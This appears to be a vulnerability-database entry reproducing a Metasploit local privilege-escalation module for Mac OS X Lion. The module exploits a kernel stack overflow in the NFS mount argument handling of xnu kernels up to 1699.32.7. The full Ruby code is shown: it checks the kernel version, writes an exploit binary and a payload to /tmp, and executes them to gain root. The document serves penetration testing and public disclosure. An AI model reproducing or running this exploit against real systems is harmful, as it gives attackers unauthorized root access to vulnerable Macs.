Mac OS X NFS Mount Privilege Escalation Exploit

1976-01-01T00:00:00
ID MSF:EXPLOIT/OSX/LOCAL/NFS_MOUNT_ROOT
Type metasploit
Reporter Rapid7
Modified 1976-01-01T00:00:00

Description

This exploit leverages a stack overflow vulnerability to escalate privileges. The vulnerable function nfs_convert_old_nfs_args does not verify the size of a user-provided argument before copying it to the stack. As a result, by passing a large size as an argument, a local user can overwrite the stack with arbitrary content. Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule &lt; Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'          =&gt; 'Mac OS X NFS Mount Privilege Escalation Exploit',
      'Description'   =&gt; %q{
        This exploit leverages a stack overflow vulnerability to escalate privileges.
        The vulnerable function nfs_convert_old_nfs_args does not verify the size
        of a user-provided argument before copying it to the stack. As a result, by
        passing a large size as an argument, a local user can overwrite the stack with arbitrary
        content.

        Mac OS X Lion Kernel &lt;= xnu-1699.32.7 except xnu-1699.24.8 are affected.
      },
      'License'       =&gt; MSF_LICENSE,
      'Author'        =&gt;
        [
          'Kenzley Alphonse', # discovery and a very well-written exploit
          'joev' # msf module
        ],
      'References'    =&gt;
        [
          [ 'EDB', '32813' ]
        ],
      'Platform'      =&gt; 'osx',
      'Arch'          =&gt; [ ARCH_X64 ],
      'SessionTypes'  =&gt; [ 'shell', 'meterpreter' ],
      'Targets'       =&gt; [
        [ 'Mac OS X 10.7 Lion x64 (Native Payload)',
          {
            'Platform' =&gt; 'osx',
            'Arch' =&gt; ARCH_X64
          }
        ]
      ],
      'DefaultTarget' =&gt; 0,
      'DisclosureDate' =&gt; 'Apr 11 2014'
    ))
  end

  def check
    if ver_lt(xnu_ver, "1699.32.7") and xnu_ver.strip != "1699.24.8"
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')
    file = File.join(osx_path, 'nfs_mount_priv_escalation.bin')
    exploit = File.read(file)
    pload   = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
    payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"

    print_status "Writing temp file as '#{tmpfile}'"
    write_file(tmpfile, exploit)
    register_file_for_cleanup(tmpfile)

    print_status "Writing payload file as '#{payloadfile}'"
    write_file(payloadfile, pload)
    register_file_for_cleanup(payloadfile)

    print_status "Executing payload..."
    cmd_exec("chmod +x #{tmpfile}")
    cmd_exec("chmod +x #{payloadfile}")
    cmd_exec("#{tmpfile} #{payloadfile}")
  end

  def xnu_ver
    m = cmd_exec("uname -a").match(/xnu-([0-9\.~]*)/)
    m && m[1]
  end

  def ver_lt(a, b)
    Gem::Version.new(a.gsub(/~.*?$/,'')) &lt; Gem::Version.new(b.gsub(/~.*?$/,''))
  end
end